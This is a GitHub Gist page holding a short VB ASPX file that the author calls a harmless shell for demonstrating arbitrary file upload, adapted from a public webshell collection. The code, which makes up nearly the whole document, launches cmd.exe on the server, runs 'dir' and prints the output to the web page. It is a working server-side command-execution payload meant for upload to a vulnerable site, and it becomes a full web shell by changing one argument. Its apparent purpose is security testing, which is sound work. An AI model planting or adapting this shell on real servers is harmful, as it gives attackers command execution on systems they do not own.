Last active
July 20, 2021 15:25
-
-
Save honoki/3139896172744c5eed078adbf4389ffd to your computer and use it in GitHub Desktop.
A harmless ASPX shell to demonstrate the impact of arbitrary file upload.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="VB" Debug="true" %> | |
| <%@ import Namespace="system.IO" %> | |
| <%@ import Namespace="System.Diagnostics" %> | |
| <!-- sources: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx --> | |
| <% | |
| Response.Write("Executing code.") | |
| Dim myProcess As New Process() | |
| Dim myProcessStartInfo As New ProcessStartInfo("c:\windows\system32\cmd.exe") | |
| myProcessStartInfo.UseShellExecute = false | |
| myProcessStartInfo.RedirectStandardOutput = true | |
| myProcess.StartInfo = myProcessStartInfo | |
| myProcessStartInfo.Arguments="/c dir" | |
| myProcess.Start() | |
| Dim myStreamReader As StreamReader = myProcess.StandardOutput | |
| Dim myString As String = myStreamReader.Readtoend() | |
| myProcess.Close() | |
| Response.Write("<pre>" & mystring & "</pre>") | |
| %> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment